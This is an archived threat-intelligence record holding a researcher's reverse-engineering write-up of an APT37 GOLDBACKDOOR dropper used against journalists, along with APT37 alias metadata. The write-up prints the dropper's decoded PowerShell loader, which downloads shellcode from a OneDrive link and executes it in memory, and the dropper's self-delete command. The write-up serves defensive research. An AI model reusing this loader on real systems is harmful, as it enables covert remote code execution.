{
	"id": "181408f4-78d3-4878-8533-1c1f9791e34c",
	"created_at": "2026-04-06T00:18:10.064363Z",
	"updated_at": "2026-04-10T03:27:23.462742Z",
	"deleted_at": null,
	"sha1_hash": "7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92",
	"title": "REarchive: Reverse Engineering APT37's GOLDBACKDOOR dropper",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1519721,
	"plain_text": "REarchive: Reverse Engineering APT37's GOLDBACKDOOR dropper\r\nBy Ovi\r\nPublished: 2023-09-25 · Archived: 2026-04-05 18:28:08 UTC\r\nPlease note: The sample covered in this report is from September 2022-January 2023. I have covered this sample for archiving purposes; it does not pertain to a known recent threat campaign, though the techniques covered may still apply.\r\nRE:archive\r\nI had this idea to archive the reverse engineering of malware or exploits from historic or prior campaigns by APT groups. Of course, where possible, I want to cover malware and exploits from current samples, but sometimes this is not possible: either it's too sensitive to disclose, it wasn't found in my network of people, or the sample has not been published. So much of the content produced by TI corporations on malware samples is either high-level, abstracted or sometimes does not disclose samples for reverse engineering. Along my travels, I'm often revisiting old samples to understand TTPs or evolutions. Retrohunting, I say, is also retro-reverse engineering. So with this, I wanted to create a space for this type of content on this website; I call this project the RE:archive. I hope that here I can find a space to reverse engineer older samples related to APT groups, where they haven't been covered before or are simply of genuine interest.\r\nIntroduction to GOLDBACKDOOR dropper\r\nJournalists have been a predominant target for intelligence operations by threat groups supported by nation state actors. In particular, threat actors from the Democratic People’s Republic of Korea (DPRK) have made consistent and sophisticated efforts over the last decade to target individuals, such as activists and journalists, who speak out against the regime.\r\nAs an independent researcher, I work with non-profit groups supporting human rights activists, journalists, and anybody at risk from digital threats. 
Recently, in going back through my samples, I found a number of samples I hadn't really discussed in depth before, which sparked the REarchive project. One such sample was this, a GOLDBACKDOOR dropper campaign that was seen in January 2023. This is a relatively trivial malware dropper, but it hasn't really been covered much publicly. Whilst the time sensitivity of releasing a technical report on this malware has lapsed, I believe it is still valuable to document and archive the reverse engineering of this malware, since I don't believe there has been much detailed technical reporting publicly on it (other than Stairwell's). My intention here is to cover what this malware does/did as a retrospective analysis; it may support future defence of civil society and journalists.\r\nDistribution\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 1 of 13\n\nThe sample covered in this report was passed to us from a journalist who had received a message within the KakaoTalk messaging app. The message discussed the exchange of private and sensitive information related to important figures in the context of North Korea-related activities in South Korea.\r\nThe sender asked the journalist to look at the files attached to the message (a .zip file). 
Some of the content within the zip package contained private and sensitive documentation and images relating to individuals pertinent to North Korean/South Korean politics.\r\nContained within the media content is a file with the filename:\r\n개인정보_처리방침_신구대조표_v1_0_220805.pdf.pif.\r\nGOLDBACKDOOR dropper\r\nThe file type is a PIF file (Program Information File). PIF files are the standard Windows files that the operating system uses to store start-up properties for DOS applications. A PIF file contains the application's details, such as its name, size, location, creation and modification date, default screen size, memory usage, idle sensitivity, etc. This Windows feature lets users avoid adjusting the DOS application's operating mode each time it is started: it is enough to set up the program once and save the configuration to a PIF file. Note that Windows also treats a .pif file that contains a PE image as an ordinary executable and hides the .pif extension in Explorer by default, which is what makes the .pdf.pif filename convincing.\r\nWhen looking at the entropy of the file, we notice a large .rsrc section.\r\nThis is due to the files contained there, which include a PDF and icons for PDF file types.\r\nThe sample itself contains many anti-* techniques; however, many of these are a result of the compiler. Because of this, you should note that they are typically standard for VS compilations. I included a review of these for a contextual understanding of the compilation settings of this malware and to support other reverse engineers in identifying these common attributes in malware.\r\nWhen debugging the sample, we hit anti-debug checks. These include Visual Studio compiler functionality such as __scrt_initialize_crt(1). 
This is common with VS compilations.\r\nIt checks CPUID and whether the processor feature PF_XMMI64_INSTRUCTIONS_AVAILABLE is present on the impacted system. If it is, the malware knows that the SSE2 instruction set is available and more complex mathematical operations are possible.\r\nIf it’s not available, it calls IsProcessorFeaturePresent(0x17u) to check for __fastfail support before calling IsDebuggerPresent \u0026 UnhandledExceptionFilter, which checks whether an exception occurs with no exception handler registered, i.e. checking for a debugger.\r\nOnce the anti-* checks and various compiler checks are made, WinMain is executed.\r\nWe first see a call to FindResourceA, where the malware looks for the custom binary resource containing the embedded files we noted earlier, at 0x67.\r\nOnce it finds, loads and locks the resource, we see a handle to the executable and a region allocation. This is followed by a call to memmove to copy the resource data to the newly allocated region.\r\nIt then calls GetModuleFileNameW, which returns the current location the malware is running from, so that it can decrypt a list of strings that will be used to create a filename for the PDF it extracts next from the resources.\r\nWe then see an additional FindResourceA call get a handle to the PDF file contained within .rsrc.\r\nCalling GetTempPathW, the malware looks up the user's temp directory to write the PDF file to with its generated filename.\r\nThis is followed by some string appending and a call to _wfopen \u0026 fwrite to write the PDF to the temp path.\r\nWhen the malware executes, the file is written to the temp directory. 
With the file name: ‘개인정보 처리방침 신구대조표_v1.0_220805.pdf’.\r\nThe dropper then uses the ShellExecuteW function with the “open” verb to open the file, which opens the PDF in whatever default app the user has configured for PDF files. As a result, the user thinks they simply opened a PDF file when they originally clicked on the executable.\r\nFollowing the loading of this, GetTempPath is called again and a BAT script is written there.\r\nThe content of the BAT script is written using fwrite, from a buffer contained in the binary that holds a PowerShell script.\r\nThis is followed by a ShellExecuteW call with the open verb on the BAT script.\r\nOpening the full contents of the BAT script, we see that it launches cmd.exe to run a hidden PowerShell command which carries a long hex-encoded script (omitted here), rebuilds it two hex characters at a time into a string, and executes it via Invoke-Command with a script block created from that string. Decoded, this results in:\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072); $aa='[DllImport\r\n$b=Add-Type -MemberDefinition $aa -Name \"AAA\" -PassThru;\r\n$abab = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d\r\n$aab=Add-Type -MemberDefinition $abab -Name \"AAB\" -PassThru;\r\n$c = New-Object System.Net.WebClient; $d=\"https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBaFF\r\n$bb='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint\r\n$ccc=Add-Type -MemberDefinition $bb -Name \"BBB\" -PassThru; $ddd='[DllImport(\"kernel32.dll\")]public static extern\r\ndo {\r\ntry {\r\n$c.Headers[\"user-agent\"] = \"connnecting...\";\r\n$xmpw4=$c.DownloadData($d);\r\n$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100);\r\n$old = 0;\r\n $aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);\r\n for ($h = 1; $h -lt $xmpw4.Length; $h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw\r\n};\r\ntry{throw 1;}\r\ncatch{\r\n$handle=$ccc::CreateThread(0,0,$x0,0,0,0); $fff::WaitForSingleObject($handle, 500*1000);\r\n};\r\n$e=222;}\r\ncatch{\r\nsleep 11;\r\n$e=112;\r\n} } while($e -eq 112);\r\nThe victim’s machine will then spawn a command line process which subsequently executes the PowerShell script. 
The script will then download and execute a shellcode payload (XOR encoded, using the first byte as the key) stored in Microsoft OneDrive.\r\nFollowing this execution, the second stage shellcode is executed and the dropper calls vsprintf to build the command line “cmd.exe /C ping 1.1.1.1 -n 1 -w 2000 \u003e Nul \u0026 Del /f /q \\”%s\\”” and executes it to delete itself.\r\nAt the time of writing, the second stage payload C2 was not live, thus we were unable to successfully pull the shellcode for analysis.\r\nConclusion\r\nDuring this analysis, I found close parallels and overlaps between this dropper and multiple samples I had received from human rights activists and journalists. Notably, the PowerShell script is commonly used by APT37, though the methodology for its execution may change. This appears to be a common feature of GOLDBACKDOOR’s dropper.\r\nHuman rights activists and journalists who may be targeted by campaigns such as this should be extra vigilant when receiving documents or executables by message or mail. Droppers like this are intended to trick the victim into executing a file that will result in further stages of malware being delivered to the machine.\r\nIf you have been a victim or feel targeted by a threat group, you are welcome to reach out to me or to organizations such as Interlab. If you are ever worried about targeting, or want to validate anything you think may be a digital threat to you, we welcome you to contact us for support.\r\nIOC and sample\r\n4270815d05d95c9baaf79508a350b504f157e32fba5506b49aebe8e35182e52f\r\nAvailable on Bazaar or VirusTotal\r\nAbout this website\r\nI am Ovi, an independent researcher. My work is solely related to human \u0026 digital rights activism, focusing on reverse engineering, data privacy violations \u0026 surveillance by hostile government and private organizations that threaten humanity. 
I work with non-profit groups and directly with those at risk. As an independent researcher, getting my research, work and writings out can be hard, which is why I created this website. You can read more about this here. If you feel that you value this work, please consider subscribing, which will allow me to share my work directly with those who appreciate it without having to work with media organizations.\r\nSource: https://www.0x0v1.com/rearchive-goldbackdoor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.0x0v1.com/rearchive-goldbackdoor/"
	],
	"report_names": [
		"rearchive-goldbackdoor"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434690,
	"ts_updated_at": 1775791643,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92.pdf",
		"text": "https://archive.orkl.eu/7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92.txt",
		"img": "https://archive.orkl.eu/7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92.jpg"
	}
}